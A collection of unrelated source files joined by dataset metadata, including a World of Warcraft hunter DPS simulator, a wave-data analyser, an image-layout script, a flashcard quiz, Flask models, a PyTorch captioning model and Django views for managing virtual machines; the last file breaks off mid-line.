0\n\n #runs each time a ranged attack is made, rolls on-hit talents and adds to the hunters mark attack counter\n def attack():\n global hunters_mark_attacks,hunters_mark_timer,crit_percent\n if talents.master_tactician != 0:\n i = random.randint(1,100)\n if i >= 1 and i <= 6 and buffsActive['master_tactician'] == False:\n crit_percent += (talents.master_tactician * 2)\n buffsActive['master_tactician'] = True\n buffs['master_tactician'] = 8\n if hunters_mark_timer > 0:\n if hunters_mark_attacks < 30:\n hunters_mark_attacks += 1\n\n # runs on ability uses/auto attacks and rolls a chance to proc the player's trinket(s)\n def trinket_proc(ccrit=False):\n global mana,power,speed,casting_haste,armor_pen\n for a in range(2): #assumes 2 trinkets equipped\n if (trinkets[a].on_hit or (trinkets[a].on_crit and ccrit)) and cooldowns[trinkets[a].name] <= 0:\n i = random.randint(1,100)\n if i >= 1 and i <= trinkets[a].proc_chance:\n if buffsActive[trinkets[a].name] == False: #only apply whatever stat it gives if the buff is not already active\n if trinkets[a].on_mana != 0: mana += trinkets[a].on_mana\n if trinkets[a].duration > 0:\n if buffsActive[trinkets[a].name] == False: #only apply whatever stat it gives if the buff is not already active\n old_speed = speed\n if trinkets[a].on_power != 0: power += (trinkets[a].on_power * power_modifier)\n if trinkets[a].on_armor_pen != 0:\n armor_pen += trinkets[a].on_armor_pen\n h = (trinkets[a].on_haste / haste_rating_per_percent) / 100\n speed /= (1 + h)\n casting_haste -= h\n recalculate_rotation(old_speed)\n buffsActive[trinkets[a].name] = True\n buffs[trinkets[a].name] = trinkets[a].duration\n cooldowns[trinkets[a].name] = trinkets[a].cooldown\n #print('trinket proc',trinkets[a].name)\n\n #attempts to use a trinket in slot 1 or 2 if it's off cooldown and an on-use trinket\n def use_trinket(slot):\n global printed,power,armor_pen,speed,casting_haste\n if trinkets[slot].on_use and cooldowns[trinkets[slot].name] <= 0:\n cooldowns[trinkets[slot].name] = trinkets[slot].cooldown\n buffsActive[trinkets[slot].name] = True\n buffs[trinkets[slot].name] = trinkets[slot].duration\n power += (trinkets[slot].on_power * power_modifier)\n armor_pen += trinkets[slot].on_armor_pen\n h = (trinkets[slot].on_haste / haste_rating_per_percent) / 100\n speed /= (1 + h)\n casting_haste -= h\n\n def increment_rotation():\n global rotation_index,rotation,rotations\n rotation_index += 1\n if rotation_index >= len(rotations[rotation]):\n rotation_index = 0\n\n def recalculate_rotation(old_speed):\n if speed >= 2.5 and old_speed < 2.5:\n rotation = '1:1.5'\n rotation_index = 0\n elif speed >= 1.7 and old_speed >= 2.5:\n rotation = '3:2'\n rotation_index = 0\n elif speed < 1.7 and old_speed >= 1.7:\n rotation = '1:1'\n rotation_index = 0\n\n #run this function every time the boss armor changes (armor penetration) so the damage reduction formula adjusts itself\n def recalculate_boss_armor_reduction():\n global boss_armor,boss_armor_reduction\n boss_armor = 7700 - armor_pen #7700 is the armor for the majority of bosses in TBC (at least t4 and t5). Adjust this as you wish if you're testing against a specific boss.\n boss_debuffs = {'sunder':True,'faerie':True,'cor':True,'iseal_of_the_crusader':True,'jow':True,'expose_weakness':False}\n boss_debuff_timers = {'expose_weakness':0}\n if boss_debuffs['sunder']:\n boss_armor -= 2600\n if boss_debuffs['faerie']:\n boss_armor -= 800\n if boss_debuffs['cor']:\n boss_armor -= 610\n boss_armor_reduction = 1 - (boss_armor / (boss_armor+400+85*(level+4.5*(70-59))))\n\n # the iteration loop. The number indicates how many seconds you want the iteration to run for\n while iteration_time > 0:\n iteration_counter += 1\n global expose_weakness_uptime,expose_weakness_dps,rotation_index,rotation,rotations,debugging\n recalculate_boss_armor_reduction()\n\n #kill command\n if cooldowns['kill_command'] <= 0 and mana >= 75 and kill_command_window > 0:\n cast('kill_command',0,75,5,0,False)\n #TODO add pet crit chance\n damage += random.randint(pet_base_damage_lower+127,pet_base_damage_upper+127) * boss_armor_reduction\n #change to aspect of the viper at 10% mana\n if ((mana / maxmana) <= 0.1 and (mana/maxmana) < (boss_hp/boss_max_hp)) and buffsActive['aotw'] == False:\n wait_gcd()\n buffsActive['aoth'] = False\n power-=(155*power_modifier)\n buffsActive['aotw'] = True\n mp5 += (intellect*(0.55+aspect_of_the_viper_modifier) + (level * 0.35))\n aa_gcd = aa_gcd_val\n #finish the mp5 bonus\n #use hunter's mark if it's about to run out\n \"\"\"if hunters_mark_timer <= 5:\n while mana < 60 or gcd > 0:\n pass_time()\n hunters_mark_attacks_timer = 120\n aa_gcd = aa_gcd_val\n cast('',gcdVal/casting_haste,60,0,0,True)\"\"\"\n #pop drums if missing mana is 600 or more\n if mana <= maxmana-600 and cooldowns['drums'] <= 0:\n #TODO do drums get 1s gcd or 1.5s?\n cast('drums',gcdVal/casting_haste,-600,120,1,True)\n #pop drums when available (haste)\n \"\"\"if cooldowns['drums'] <= 0:\n cast('drums',0,0,120,0,True)\n old_speed = speed\n speed /= (1+((80/haste_rating_per_percent)/100))\n casting_haste += ((80/haste_rating_per_percent)/100)\n buffsActive['drums_of_battle'] = True\n buffs['drums_of_battle'] = 30\n recalculate_rotation(old_speed)\"\"\"\n #pop demonic rune if missing mana is 1500 or more\n \"\"\"if (mana <= maxmana - 1500) and cooldowns['demonic_rune'] <= 0:\n cast('demonic_rune',0,random.randint(-1500,-900),120,0,False)\"\"\"\n #pop mana potion if missing mana is 3000 or more\n if (mana <= maxmana - 3000) and cooldowns['mana_potion'] <= 0:\n cast('mana_potion',0,random.randint(-3000,-1800),120,0,False)\n #change to aspect of the hawk if at full mana or mana % is twice the hp % of the boss (needs further tweaking for when to switch back to aoth)\n if ((mana / maxmana) >= 0.95 or (mana / maxmana) >= (boss_hp / boss_max_hp)) and buffsActive['aoth'] == False:\n wait_gcd()\n buffsActive['aoth'] = True\n power += 155*power_modifier\n if buffsActive['aotw']:\n buffsActive['aotw'] = False\n mp5 -= (intellect*(0.55+aspect_of_the_viper_modifier) + (level * 0.35))\n aa_gcd = aa_gcd_val\n #pop on-use trinkets, racial, and rapid fire\n if hunters_mark_attacks >= 30 and (cooldowns['rapid_fire'] <= 0 and cooldowns['berserking'] <= 0 and ((trinkets[0].on_use and cooldowns[trinkets[0].name] <= 0) or (trinkets[1].on_use and cooldowns[trinkets[1].name] <= 0))): #TODO add on-use trinkets\n cooldowns['rapid_fire'] = 180\n #cooldowns['berserking'] = 180\n buffs['rapidfire'] = 15\n buffs['berserking'] = 10\n buffsActive['rapidfire'] = True\n #buffsActive['berserking'] = True\n old_speed = speed\n speed /= 1.4\n #speed /= 1.1\n casting_haste += 0.4\n #casting_haste += 0.1\n gcdVal /= 1.4\n #gcdVal /= 1.1\n use_trinket(0)\n use_trinket(1)\n recalculate_rotation(old_speed)\n #pop rapid fire and berserking\n if hunters_mark_attacks >= 30 and (cooldowns['rapid_fire'] <= 0 and cooldowns['berserking'] <= 0):\n cooldowns['rapid_fire'] = 180\n #cooldowns['berserking'] = 180\n buffs['rapidfire'] = 15\n buffs['berserking'] = 10\n buffsActive['rapidfire'] = True\n #buffsActive['berserking'] = True\n old_speed = speed\n speed /= 1.4\n #speed /= 1.1\n casting_haste += 0.4\n #casting_haste += 0.1\n gcdVal /= 1.4\n #gcdVal /= 1.1\n recalculate_rotation(old_speed)\n #pop trinket\n if hunters_mark_attacks >= 30 and ((trinkets[0].on_use and cooldowns[trinkets[0].name] <= 0) or (trinkets[1].on_use and cooldowns[trinkets[1].name] <= 0)):\n old_speed = speed\n use_trinket(0)\n use_trinket(1)\n recalculate_rotation(old_speed)\n #use misdirect if it's available and global cooldown is 0\n \"\"\"if cooldowns['misdirection'] <= 0 and gcd <= 0 and mana >= 304:\n cast('misdirection',gcdVal/casting_haste,304,120,0,True)\n aa_gcd = aa_gcd_val\n #misdirect if it's available\n if cooldowns['misdirection'] <= 0:\n while gcd > 0 or mana < 304:\n pass_time()\n cast('misdirection',gcdVal/casting_haste,304,120,0,True)\n aa_gcd = aa_gcd_val\"\"\"\n #multi-shot/arcane shot instead of steady shot in 1:1 rotation\n if rotation == '1:1' and rotations[rotation][rotation_index] == 'ss' and ((cooldowns['multi_shot'] <= 0 and mana >= 275) or (cooldowns['arcane_shot'] <= 0 and mana >= 230)):\n if cooldowns['multi_shot'] <= 0:\n if mana >= 275:\n mana_cost = 275\n while cooldowns['multi_shot'] > 0 or gcd > 0:\n pass_time()\n cast('multi_shot',gcdVal/casting_haste,mana_cost,9,0.5/casting_haste,True)\n increment_rotation()\n elif cooldowns['arcane_shot'] <= 0:\n if mana >= 230:\n mana_cost = 230\n while cooldowns['arcane_shot'] > 0:\n pass_time()\n as_cd = (6-talents.iarcane_shot * 0.2) if talents.iarcane_shot!=0 else 6\n cast('arcane_shot',gcdVal,mana_cost,as_cd,0,True)\n increment_rotation()\n\n #auto shot\n if rotations[rotation][rotation_index] == 'aa':\n while aa_gcd > 0 or cooldowns['auto_shot'] > 0:\n pass_time()\n #cooldowns['auto_shot'] = speed\n cast('auto_shot',0,0,speed,aa_gcd,False)\n increment_rotation()\n #steady shot\n if rotations[rotation][rotation_index] == 'ss':\n mana_cost = 110\n if mana >= mana_cost:\n cast('steady_shot',gcdVal/casting_haste,mana_cost,0,1.5/casting_haste,True)\n increment_rotation()\n #multi-shot\n if rotations[rotation][rotation_index] == 'ms':\n if mana >= 275:\n mana_cost = 275\n while cooldowns['multi_shot'] > 0 or gcd > 0:\n pass_time()\n cast('multi_shot',gcdVal/casting_haste,mana_cost,9,0.5/casting_haste,True)\n increment_rotation()\n #arcane shot\n if rotations[rotation][rotation_index] == 'as':\n if mana >= 230:\n mana_cost = 230\n while cooldowns['arcane_shot'] > 0:\n pass_time()\n as_cd = (6-talents.iarcane_shot * 0.2) if talents.iarcane_shot!=0 else 6\n cast('arcane_shot',gcdVal,mana_cost,as_cd,0,True)\n increment_rotation()\n\n pass_time()\n dps = damage/maxtime\n eweakness_uptime = expose_weakness_uptime/maxtime\n expose_weakness_dps = calculate_expose_weakness_dps() * eweakness_uptime\n \"\"\"print(str(dps) + ' dps')\n print(str(round(eweakness_uptime*100,2)) + \"% expose weakness uptime\")\n print(str(round(expose_weakness_dps,2)) + ' bonus expose weakness dps')\n print('total dps:', round(dps+expose_weakness_dps,2))\n print('fight length', maxtime//60, 'minutes')\n print('simulation runtime', str(round((time.time()-start)/60,1)) + ' minutes')\"\"\"\n iterations_damage.append(dps)\n expose_weakness_uptime_list.append(eweakness_uptime)\n expose_weakness_dps_list.append(expose_weakness_dps)\n madness_uptime_list.append(madness_uptime)\n damage=0\n expose_weakness_uptime=0\n madness_uptime=0\n#while (time.time() - start) < 60:\nwhile iteration_counter < iterations:\n main()\nprint(round(sorted(iterations_damage)[len(iterations_damage)//2],2),'dps')\nprint(str(round(sorted(expose_weakness_uptime_list)[len(expose_weakness_uptime_list)//2]*100,2)) + \"% expose weakness uptime\")\nprint(round(sorted(expose_weakness_dps_list)[len(expose_weakness_dps_list)//2],2),'bonus expose weakness dps')\nprint('total dps:',round(round(sorted(iterations_damage)[len(iterations_damage)//2],2) + round(sorted(expose_weakness_dps_list)[len(expose_weakness_dps_list)//2],2)))\nprint(round((time.time()-start)/60,1),'minutes')\nprint('madness',madness_uptime_list[len(madness_uptime_list)//2])\n","sub_path":"Hunter/Hunter.py","file_name":"Hunter.py","file_ext":"py","file_size_in_byte":39491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"309953296","text":"import input_reader\nimport transform_data\nimport filters\nimport statistics\nimport plotting\nfrom orientation import Orientation\nfrom low_pass_filter import smooth\n\n\nclass Wave:\n def __init__(self, file_name):\n # parameters:\n self.average_gravity = 9.815\n self.ex_size_vel = 40 # default value, range: 20-100\n self.ex_size_rel = 0.5\n self.det_prec_vel = 0.9\n self.det_prec_rel = 1.0\n self.ex_size_dis = int(self.ex_size_vel * self.ex_size_rel)\n self.det_prec_dis = self.det_prec_vel * self.det_prec_rel\n self.mean_acc_weight = 0.05\n self.mean_vel_weight = 0.03 # default value, range: 0.01 - 0.05\n self.period_est_weight = 0.005\n # correct avg height x to corrected avg height y, with y = a*x + b, where:\n # [a, b] below.\n a = [1.0253, 0.0141]\n b = [0.965, -0.016]\n self.height_correct_factors = b\n\n # variables:\n self.file_name = file_name\n self.est_average_period = 0.0\n self.average_wave_height = 0.0\n self.average_wave_period = 0.0\n self.acc_std_dev = 0.0\n self.avg_cor_wave_height = 0.0\n self.time = []\n self.acc_readings = []\n self.anti_drift_acc_readings = []\n self.filtered_acc_readings = []\n self.distances = []\n self.velocities = []\n self.drift_corrected_velocity = []\n self.drift_corrected_distance = []\n self.height_corrected_distance = []\n self.filtered_velocity = []\n self.vel_crests = []\n self.vel_troughs = []\n self.pos_crests = []\n self.pos_troughs = []\n\n # running the program\n #input_reader.read_acc_data(self)\n\n ori = Orientation(self)\n ori.set_z_madg(self)\n\n self.acc_std_dev = statistics.get_std_dev(self.acc_readings) # for analysis of the algorithm\n\n filters.anti_drift_filter(self.time, self.acc_readings, self.anti_drift_acc_readings)\n\n statistics.estimate_period(self, True)\n\n filters.filter_readings(self.anti_drift_acc_readings, self.filtered_acc_readings, self.mean_acc_weight)\n\n #self.filtered_acc_readings = smooth(self.anti_drift_acc_readings)\n\n transform_data.integrate(self.time, self.filtered_acc_readings, self.velocities)\n filters.filter_readings(self.velocities, self.filtered_velocity, self.mean_vel_weight)\n transform_data.drift_correct(self.filtered_velocity, self.drift_corrected_velocity, self.ex_size_vel,\n self.det_prec_vel, self.vel_crests, self.vel_troughs)\n transform_data.integrate(self.time, self.drift_corrected_velocity, self.distances)\n transform_data.drift_correct(self.distances, self.drift_corrected_distance, self.ex_size_dis,\n self.det_prec_dis, self.pos_crests, self.pos_troughs)\n\n statistics.get_wave_data(self, False)\n\n transform_data.height_correct(self)\n\n statistics.get_wave_data(self, True)\n\n","sub_path":"wave_data_analyser/wave_data_analyser.py","file_name":"wave_data_analyser.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"74727411","text":"def four_up_writer(image_list, title='Untited', output_filename='images4up'):\n ''' take a list of images, and lay them in a four-up configuration '''\n\n def res_img(image, new_width, new_height):\n ''' resize an image '''\n #resizing images to fit in the bins.\n #https://stackoverflow.com/questions/273946/how-do-i-resize-an-image-using-pil-and-maintain-its-aspect-ratio\n #img = img.resize((basewidth,hsize), PIL.Image.ANTIALIAS)\n\n from PIL import Image\n return image.resize((new_width,new_height), Image.ANTIALIAS)\n\n import datetime as dt\n import numpy as np\n from PIL import Image, ImageDraw\n from pic_canvas import pic_canvas\n \n #glob.glob('*.png')\n # ['HAI CAUTI.png', 'HAI CLABSI.png', 'HAI VAE.png', 'HAI MRSA.png']\n #image_pieces = ['piv1.png','piv2.png','piv3.png']\n\n # make a blank to fit in an open space\n blank = Image.new('RGB', (5, 5), (255, 255, 255))\n\n # open all of the images into a list\n images = map(Image.open, image_list)\n\n dpi = 300\n\n total_size = int(11*dpi)\n\n total_height = int(8.5*dpi)\n\n W = total_size\n\n H = total_height\n\n h = 140\n\n f = h\n\n h1 = (H - h - f) / 2\n\n import itertools\n #A8 = min(h1, W/4)\n #A8seeds = [(int(x),int(y)) for x,y in itertools.product( W*np.linspace(0, 1, num=4, endpoint=False),(h,h1) ) ]\n\n A4_h = min(h1, W/2)\n A4_w = max(h1, W/2)\n \n A4seeds = [(int(x),int(y)) for x,y in itertools.product( W*np.linspace(0, 1, num=2, endpoint=False),(h,h + h1 + 1) ) ]\n\n # make a blank canvas\n #new_im = Image.new('RGB', (total_size,total_height), (255, 255, 255))\n new_im = pic_canvas(title)\n\n #resize all the images to fit\n images = [res_img(i, A4_w, A4_h) for i in images]\n\n for i,j in enumerate(A4seeds):\n try:\n hold = images[i]\n except:\n hold = blank\n new_im.paste(hold, j)\n\n draw = ImageDraw.Draw(new_im)\n\n # horizontal divider line\n draw.line((0, H/2, W, H/2), fill=(0,0,0), width=2)\n\n # A4 vertical divider line\n draw.line((W/2, h, W/2, H - f), fill=(0,0,0), width=2)\n\n new_im.save(output_filename+'.png')\n new_im.save(output_filename+'.pdf')","sub_path":"QMTools/four_up/four_up_writer.py","file_name":"four_up_writer.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"645634404","text":"\"\"\"\nDefault style\n\"\"\"\nfrom contextlib import contextmanager\nfrom docx.shared import Pt, Mm\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH, WD_LINE_SPACING\n\nvalue_of = contextmanager(lambda v: (yield v))\n\nclass Style:\n \"\"\"Default style class\"\"\"\n @classmethod\n def apply(cls, doc):\n \"\"\"Apply style do document\"\"\"\n with value_of(doc.sections[0]) as section:\n # Page size A4\n section.page_height = Mm(297)\n section.page_width = Mm(210)\n\n # Margins\n section.top_margin = Pt(60)\n section.bottom_margin = Pt(60)\n section.left_margin = Pt(60)\n section.right_margin = Pt(60)\n\n # Normal\n with value_of(doc.styles['Normal']) as normal:\n normal.font.name = 'Calibri Light'\n normal.font.size = Pt(10)\n normal.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.JUSTIFY\n normal.paragraph_format.line_spacing_rule = WD_LINE_SPACING.SINGLE\n normal.paragraph_format.space_after = Pt(10)\n\n # Quote\n with value_of(doc.styles['Quote']) as quote:\n quote.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.LEFT\n\n for heading_level in range(1, 4): # 1..3\n with value_of(doc.styles[f'Heading {heading_level}']) as heading:\n heading.font.color.rgb = None\n heading.font.name = 'Calibri'\n heading.font.size = Pt(10 + 2 * (3 - heading_level))\n heading.font.bold = True\n heading.font.small_caps = True\n heading.paragraph_format.space_before = None\n","sub_path":"md2docx/styles/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"178717443","text":"# flashcards.py\n\n# import the json module from python3\nimport json\n\n# open the file and parse the json\nwith open('me-capitals.json', 'r') as f:\n data = json.load(f)\n\n# initialize total as the length of the cards array\ntotal = len(data[\"cards\"])\n# initialize score as 0\nscore = 0\n\nwhile score == 0:\n score = 0\n\n for i in data[\"cards\"]:\n guess = input(i[\"q\"] + \" > \")\n # print(guess)\n\n if guess.lower() == i['a'].lower():\n # increment score up one\n score += 1\n # interpolate score and total into the response\n print(f\"Correct! Current score: {score}/{total}\")\n else:\n print(\"Incorrect! The correct answer was\", i[\"a\"])\n print(f\"Current score: {score}/{total}\")\n\n play_again = input(\"Would you like to play again? (yes/no) > \")\n if play_again == 'yes':\n score = 0\n total = len(data[\"cards\"])\n else:\n break\n","sub_path":"flashcards.py","file_name":"flashcards.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"587734344","text":"from app import db\r\n\r\n# pen tag joining table\r\nPenTag = db.Table('PenTag', db.Model.metadata,\r\ndb.Column('pid', db.Integer, db.ForeignKey('Pen.id')),\r\ndb.Column('tid', db.Integer, db.ForeignKey('Tag.id'))\r\n)\r\n\r\n\r\n# brands\r\nclass Brand(db.Model):\r\n __tablename__ = 'Brand'\r\n\r\n id = db.Column(db.Integer, primary_key = True)\r\n name = db.Column(db.String, nullable = False)\r\n desc = db.Column(db.Text)\r\n photo = db.Column(db.Text)\r\n deletable = db.Column(db.Boolean)\r\n pens = db.relationship('Pen', backref='brand')\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\n# credits to information or images used in the website\r\nclass Credit(db.Model):\r\n __tablename__ = \"Credit\"\r\n\r\n id = db.Column(db.Integer, primary_key = True)\r\n name = db.Column(db.String, nullable = False)\r\n link = db.Column(db.Text, nullable = False)\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\n# pens\r\nclass Pen(db.Model):\r\n __tablename__ = \"Pen\"\r\n\r\n id = db.Column(db.Integer, primary_key = True)\r\n name = db.Column(db.String, nullable = False)\r\n desc = db.Column(db.Text)\r\n photo = db.Column(db.Text)\r\n bid = db.Column(db.Integer,db.ForeignKey('Brand.id'), nullable = False)\r\n tags = db.relationship('Tag', secondary=PenTag, back_populates='pens')\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\n\r\n# tags\r\nclass Tag(db.Model):\r\n __tablename__ = \"Tag\"\r\n\r\n id = db.Column(db.Integer, primary_key = True)\r\n name = db.Column(db.String, nullable = False)\r\n desc = db.Column(db.Text)\r\n photo = db.Column(db.Text)\r\n pens = db.relationship('Pen', secondary=PenTag, back_populates='tags')\r\n\r\n def __str__(self):\r\n return self.name","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"469141359","text":"import torch\nimport torch.nn as nn\nimport torchvision.models as models\nimport torch.nn.functional as F\nimport numpy as np\n\ntrain_on_gpu = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\nclass EncoderCNN(nn.Module):\n def __init__(self, embed_size):\n super(EncoderCNN, self).__init__()\n resnet = models.resnet50(pretrained=True)\n for param in resnet.parameters():\n param.requires_grad_(False)\n\n modules = list(resnet.children())[:-1]\n self.resnet = nn.Sequential(*modules)\n self.embed = nn.Linear(resnet.fc.in_features, embed_size)\n\n def forward(self, images):\n features = self.resnet(images)\n features = features.view(features.size(0), -1)\n features = self.embed(features)\n return features\n\n def get_learnable_parameters(self, ):\n return [param for name, param in self.named_parameters() if name.startswith('embed')]\n\n\nclass DecoderRNN(nn.Module):\n def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1, dropout=0):\n super(DecoderRNN, self).__init__()\n self.embed_size = embed_size\n self.hidden_size = hidden_size\n self.vocab_size = vocab_size\n self.num_layers = num_layers\n\n # define model layers\n self.embed = nn.Embedding(num_embeddings=vocab_size, embedding_dim=embed_size)\n self.lstm = nn.LSTM(input_size=embed_size, hidden_size=hidden_size, num_layers=num_layers, dropout=dropout,\n batch_first=True)\n self.fc = nn.Linear(in_features=hidden_size, out_features=vocab_size)\n\n def forward(self, features, captions):\n # batch size\n batch_size = features.size(0)\n\n hidden_state, cell_state = self.init_hidden(batch_size, features)\n\n # define the output tensor placeholder\n outputs = torch.zeros((batch_size, captions.size(1), self.vocab_size)).to(device)\n\n # embed the captions\n captions_embed = self.embed(captions)\n\n # pass the caption word by word\n for t in range(captions.size(1) - 1):\n out, (hidden_state, cell_state) = self.lstm(captions_embed[:, t, :].view(batch_size, 1, -1),\n (hidden_state, cell_state))\n out = out.contiguous().view(-1, self.hidden_size)\n out = self.fc(out)\n # build the output tensor\n outputs[:, t + 1, :] = out\n\n return outputs\n\n def sample(self, inputs, states=None, max_len=20, top_k=5):\n \" accepts pre-processed image tensor (inputs) and returns predicted sentence (list of tensor ids of length max_len) \"\n\n batch_size = inputs.size(0)\n # list of word indices\n word_idxs = torch.zeros((batch_size, max_len)).type(torch.LongTensor)\n outputs = torch.zeros((batch_size, max_len, self.vocab_size)).to(device)\n\n def sample_word_from_fc_out(fc_out):\n p = F.softmax(fc_out, dim=1).data\n p, top_ch = p.topk(top_k)\n word_idxs_for_batch = torch.zeros(batch_size, dtype=torch.long)\n for i in range(top_ch.size(0)):\n top_ch_i = top_ch[i].cpu().numpy().squeeze()\n # select the likely next character with some element of randomness\n p_i = p[i].cpu().numpy().squeeze()\n word_idx = np.random.choice(top_ch_i, p=p_i / p_i.sum())\n word_idxs_for_batch[i] = int(word_idx)\n return word_idxs_for_batch\n\n hidden_state, cell_state = self.init_hidden(batch_size, inputs)\n\n word_idx_for_batch = torch.zeros((batch_size, 1), dtype=torch.long).to(device)\n for i in range(max_len - 1):\n embedding = self.embed(word_idx_for_batch.to(device))\n lstm_out, (hidden_state, cell_state) = self.lstm(embedding.view(batch_size, 1, -1),\n (hidden_state, cell_state))\n lstm_out = lstm_out.contiguous().view(-1, self.hidden_size)\n fc_out = self.fc(lstm_out)\n outputs[:, i, :] = fc_out\n word_idx_for_batch = sample_word_from_fc_out(fc_out)\n word_idxs[:, i] = word_idx_for_batch\n\n return word_idxs, outputs\n\n def init_hidden(self, batch_size, features):\n '''\n Initialize the hidden state of an LSTM/GRU\n :param batch_size: The batch_size of the hidden state\n :return: hidden state of dims (n_layers, batch_size, hidden_dim)\n '''\n # Implement function\n\n # initialize hidden state with zero weights, and move to GPU if available\n\n # Create two new tensors with sizes n_layers x batch_size x n_hidden,\n # initialized to zero, for hidden state and cell state of LSTM\n weight = next(self.parameters()).data\n\n if (train_on_gpu):\n hidden_state, cell_state = (weight.new(self.num_layers, batch_size, self.hidden_size).zero_().cuda(),\n weight.new(self.num_layers, batch_size, self.hidden_size).zero_().cuda())\n else:\n hidden_state, cell_state = (weight.new(self.num_layers, batch_size, self.hidden_size).zero_(),\n weight.new(self.num_layers, batch_size, self.hidden_size).zero_())\n\n # initialized the first hidden layer with the extracted features from the CNN\n hidden_state[0, :, :] = features.view(1, batch_size, self.hidden_size)\n cell_state[0, :, :] = features.view(1, batch_size, self.hidden_size)\n return hidden_state, cell_state\n","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"56578643","text":"N, M = map(int, input().split())\n\nparts = []\nfor _ in range(M):\n mask = 0\n s, c = input().split()\n for i, f in enumerate(s):\n if f == 'Y':\n mask |= (1 << i)\n parts.append((mask, int(c)))\n\nINF = 10**18\ndp = [INF] * (1 << N)\ndp[0] = 0\nfor state in range(1 << N):\n for mask, c in parts:\n if dp[state | mask] > dp[state] + c:\n dp[state | mask] = dp[state] + c\n\nans = dp[(1 << N) - 1]\nprint(ans if ans < INF else -1)\n","sub_path":"AtCoder/other/PAST_1/i.py","file_name":"i.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"351154255","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, render_to_response\nfrom django.template import RequestContext\nfrom django.contrib.auth import logout\nfrom django.http import HttpResponseRedirect, JsonResponse\n\nimport uuid\nimport json\n\n# Access point to the middleware variables\nfrom ..middleware import *\nfrom ..models.models_virtual_resource import *\nfrom ..models.models_auth import *\nfrom ..exceptions import DeployException\nfrom ..decorators import *\n# from ..tests import *\n\n# Create your views here.\n# TODO When application start need to check all hosts from db to see if it is up\n# use get_hosts_list from server to compare\n\n\n# URL: /host_clients\n#\n@ensure_user_auth\ndef controller_hypersor_list(request):\n if request.user.is_authenticated: # authenticated\n\n # Hosts alive\n activeHypervisors = [hypervisor.clientMeta.currentHypervisor for hypervisor in middlware_server.getHypervisors()]\n hypervisors = HypervisorModel.objects.all()\n obj_return = []\n for host in hypervisors:\n vms = VirtualMachineModel.objects.filter(hostedOn=host)\n obj_return.append({'hypervisor': host,\n 'virtualMachines': vms})\n \n return render(request, 'app_bendis/hypervisors_list.html', {'activeHypervisors': activeHypervisors,\n 'hypervisors': hypervisors,\n 'obj_return': obj_return, })\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n# URL: /test_endpoint\n# TODO test_endpoint\ndef controller_test_endpoint(request):\n response_test = None # test_creating_vm()\n if not response_test:\n return JsonResponse({'has_error': 'false'})\n else:\n return JsonResponse({'has_error': 'true', 'msg': str(response_test)})\n\n\n# URL: /virtual_machines\n# Virtual Machines list\n@ensure_user_auth\ndef controller_virtual_machines(request):\n if request.user.is_authenticated:\n vms = VirtualMachineModel.objects.filter(owner=request.user)\n obj_return = []\n \n return render(request, 'app_bendis/vm_list.html', {'vms': vms, })\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n# URL: /search\n#\n@ensure_user_auth\ndef controller_search(request):\n if request.user.is_authenticated:\n return render(request, 'app_bendis/vm_list.html', {})\n else:\n logout_status = 'You are not allow!'\n return render(request, 'auth/login.html', {'logout_status': logout_status})\n\n\n# URL: /create_virtual_machine\n#\n@ensure_user_auth\ndef controller_create_virtual_machine(request):\n if request.user.is_authenticated:\n userProfile = ProfileModel.objects.get(user=request.user)\n if request.method == 'POST':\n\n deploy_exception = DeployException()\n\n if userProfile.userAppliance.role != 'admin':\n vm_numbers = VirtualMachineModel.objects.filter(owner=request.user).count()\n if userProfile.virtual_machine_allowed <= vm_numbers:\n deploy_exception.exceed_vm_number_not_admin = 'You account has exceeded the amount of VM allowed.'\n\n vm_name = request.POST.get('vm_name', None)\n vm_ram = request.POST.get('vm_ram', None)\n vm_cpu = request.POST.get('vm_cpu', None)\n vm_os = request.POST.get('vm_os', None)\n vm_network_interface = request.POST.get('vm_network_interface', None)\n vm_disk_size = request.POST.get('vm_disk_size', None)\n vm_description = request.POST.get('vm_description', None)\n availability_zone = request.POST.get('availability-zone', None)\n vm_auto_start_deploy = request.POST.get('auto_start', None)\n\n # TODO check resources on host\n deploy_exception.check(availability_zone, vm_os, vm_name, vm_ram, vm_cpu, vm_network_interface, vm_description)\n\n # TODO If no error has been found\n if not deploy_exception.has_error():\n vmHardware = HardwareModel(hostname='', ram=str(int(vm_ram) * 1024), cpu=vm_cpu)\n vmHardware.save()\n vm = VirtualMachineModel(name=vm_name, status='creating',\n hardware=vmHardware,\n typeOS=vm_os, owner=request.user, \n hostedOn=HypervisorModel.objects.first(), \n description=vm_description,\n uuid_internal=str(uuid.uuid4()))\n vm.save()\n\n if userProfile.userAppliance.account_feature == 'load_balancing':\n if vm_disk_size == '':\n score, best_host_ip = load_balancing.recommended_host(vm)\n else:\n score, best_host_ip = 